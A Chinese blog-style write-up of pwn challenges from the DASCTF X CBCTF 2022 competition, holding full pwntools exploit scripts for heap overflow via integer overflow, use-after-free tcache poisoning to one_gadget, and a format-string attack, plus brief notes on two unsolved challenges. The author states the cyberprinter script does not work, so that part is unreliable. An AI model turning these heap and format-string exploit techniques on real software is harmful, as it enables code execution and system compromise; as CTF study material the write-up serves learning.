DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现_tfpwn

DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现

**

ez_note

**

漏洞点：注意这里·是atol不是atoi所以输入的是64位的数据
但是检测输入size的时候是用按int类型检查，可以造成堆溢出。
找到漏洞点了就可以利用了，重点在堆利用这块。
先看看exp:

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./pwn')
#elf=ELF('./pwn')

#io = remote('59.110.24.117',33320)
libc = ELF('/home/pwn/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def dbg():
    gdb.attach(p)
    pause()

def add(size,content):
    sa('Your choice:',str(1))
    sa('Note size:',str(size))
    sa('Note content:',content)

def delete(index):
    sa('Your choice:',str(2))
    sa('Note ID:',str(index))

def show(index):
    sa('Your choice:',str(3))
    sa('Note ID:',str(index))
    ru('Note content:')

# add(0x108,'a'*0x108)
add(0x80,'a')
add(0x80,'a')
add(0x200,'a')#2
add(0x200,'a')#3
add(0x80,'a')#4
# add(0x80,'a')
delete(0)
payload=b'a'*0x80+p64(0)+p64(0x4b1)
# dbg()
add(0x200000080,payload)#0
# dbg()
delete(1)
add(0x80,'a')#1
show(2)
# dbg()
libcbase=u64(p.recv(6).ljust(8, "\x00"))-0x1ecbe0
free_hook=libcbase+libc.symbols['__free_hook']
system=libcbase+libc.symbols['system']
lg('libcbase')
add(0x200,'a')#5
add(0x200,'a')#6
# delete(1)
# payload=b'a'*0x80+p64(0)+p64(0x421)
# add(0x80,payload)#1
# delete(2)
# add(0x200,'a')#2
# # add(0x200,'a')#7    
# #6 3 7
# # delete(5)
# delete(3)
# dbg()
# payload=p64(free_hook)+p64(0)
# add(0x200,payload)#7

# delete(6)
delete(3)
delete(2)
delete(1)
payload=b'a'*0x80+p64(0)+p64(0x211)+p64(free_hook)+p64(0)
add(0x200000080,payload)#1
add(0x200,b'/bin/sh\x00')#2
add(0x200,p64(system))#3
delete(2)

# dbg()
irt()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87

add(0x80,'a')
add(0x80,'a')
add(0x200,'a')#2
add(0x200,'a')#3
add(0x80,'a')#4
# add(0x80,'a')
delete(0)
payload=b'a'*0x80+p64(0)+p64(0x4b1)
# dbg()
add(0x200000080,payload)#0
1
2
3
4
5
6
7
8
9
10

这几行代码的意思是删除了chunk0后再申请0x200000080大小的chunk，因为有个整数溢出，所以0x200000080大小的堆块就是0x80大小。payload把chunk1,2,3合并成一个大小为0x4b1chunk。

然后是泄露libc地址。

delete(1)
add(0x80,'a')#1
show(2)
# dbg()
libcbase=u64(p.recv(6).ljust(8, "\x00"))-0x1ecbe0
free_hook=libcbase+libc.symbols['__free_hook']
system=libcbase+libc.symbols['system']
lg('libcbase')
1
2
3
4
5
6
7
8

add(0x200,'a')#5
add(0x200,'a')#6
# delete(1)
# payload=b'a'*0x80+p64(0)+p64(0x421)
# add(0x80,payload)#1
# delete(2)
# add(0x200,'a')#2
# # add(0x200,'a')#7    
# #6 3 7
# # delete(5)
# delete(3)
# dbg()
# payload=p64(free_hook)+p64(0)
# add(0x200,payload)#7

# delete(6)
delete(3)
delete(2)
delete(1)
# dbg()
payload=b'a'*0x80+p64(0)+p64(0x211)+p64(free_hook)+p64(0)
add(0x200000080,payload)#1
add(0x200,b'/bin/sh\x00')#2
add(0x200,p64(system))#3
delete(2)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

最后是劫持free_hook为system，得到shell。

bar

白给libc地址（为什么打比赛的时候没看这题doge）

有uaf。

from pwn import *
def dbg():
    gdb.attach(r)
    pause()

def cho(num):
    r.sendlineafter("Your choice:",str(num))

def add(idx,con):
    cho(1)
    r.sendlineafter("Whisky , brandy or Vodka?",str(idx))
    r.sendafter("You may want to tell sth to the waiter:",con)

def free(idx,size=0x100):
    cho(2)
    r.sendlineafter("Which?",str(idx))
    r.sendlineafter("How much?",str(size))

def exp():
    global r  
    global libc
    global elf
    # r=remote("127.0.0.1",9999)
    r=process('./bar')
    libc=ELF('./libc-2.31.so')
    cho(3)
    r.recvuntil("icecream!\n")
    libcbase=int(r.recvuntil('\n',drop=True),16)-libc.sym['_IO_2_1_stdout_']
    log.success("libcbase:"+hex(libcbase))

    ##set_libc_func
    ##system=libcbase+libc.sym['system']
    one=[0xe6aee,0xe6af1,0xe6af4]
    onegadget=libcbase+one[1]
    for i in range(0,10):
        add(0,'nameless') 
    for i in range(0,9):
        free(i)
    # dbg()
    add(0,'nameless')#10
    # dbg()
    ##z()
    free(8,0)
    # dbg()
    add(1,'nameless')#11
    add(1,'nameless')#12
    add(2,'nameless')#13
    # dbg()
    free(8,0x80)
    # dbg()
    add(0,'nameless')#14
    # dbg()
    # gdb.attach(r)
    # pause()
    add(0,p64(onegadget))
    # dbg()
    # add(0,'cat ')
    # dbg()
    r.interactive()
    
if __name__ == '__main__':
    exp()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

    for i in range(0,10):
        add(0,'nameless') 
    for i in range(0,9):
        free(i)
1
2
3
4

先申请10个chunk，再释放前9个。
7个在tcache bins里面，还有2个在unsorted bin里面。

    add(0,'nameless')#10
    # dbg()
    ##z()
    free(8,0)
    # dbg()
    add(1,'nameless')#11
    add(1,'nameless')#12
    add(2,'nameless')#13
    free(8,0x80)

1
2
3
4
5
6
7
8
9
10

再在tcache bin里面申请一个chunk,再释放index=8的那个，此时已经利用了uaf,unsoted bin里面和tcache bin里面都有这个chunk。

    add(0,'nameless')#14
    # dbg()
    # gdb.attach(r)
    # pause()
    add(0,p64(onegadget))
1
2
3
4
5

最后再将malloc_hook那填one_gadget得到shell。

appetizer

这题我也不大会，但说一下思路吧：
将rop链布置到end中，泄露出libc地址，通过最后一个read进行栈迁移
在第一个链中输出完之后再执行一个read向end写入第二个rop链
第二个rop链就是常规的orw了。
参考链接Mauricio_Davis师傅的blog
（对这种题头都大了doge）

cyberprinter

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./cyberprinter')
elf=ELF('./cyberprinter')

#io = remote('59.110.24.117',33320)
libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def dbg():
    gdb.attach(p)
    pause()
got_printf=elf.got['printf']


# payload = p64(got_printf) + "%9$s"
lg('got_printf')
sla('Your name?pls..\n',b'a'* 0x18)
ru('aaaaaaaaaaaaaaaaaaaaaaaa')
stdout_addr=u64(p.recv(6).ljust(8, "\x00"))
libcbase=stdout_addr-libc.symbols['_IO_2_1_stdout_']
one_gadget=libcbase+0xe6af1 #0xe6aee
got_addr=libcbase+0x1EB0A8
lg('stdout_addr')

payload=fmtstr_payload(8,{got_addr:one_gadget})
print payload
sla("But there is sth wrong in it,so you can't do sth\n",payload)
# rl()
irt()
#%7$p
#0x7f10db90c0a8 - 0x7f10db721000 0x1eb0a8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

代码没通，只是个错误示范，欢迎各位师傅来鞭尸。
讲讲思路吧：第一个printf泄露libc地址，第2个printf改puts里面那个玩意为ogg得到shell。

cgrasstring

这题真心不想复现了，就前2个堆题搞懂了，后面的搞不明白（呜呜呜，我太菜了）
参考链接：官方wp

我好菜，呜呜呜。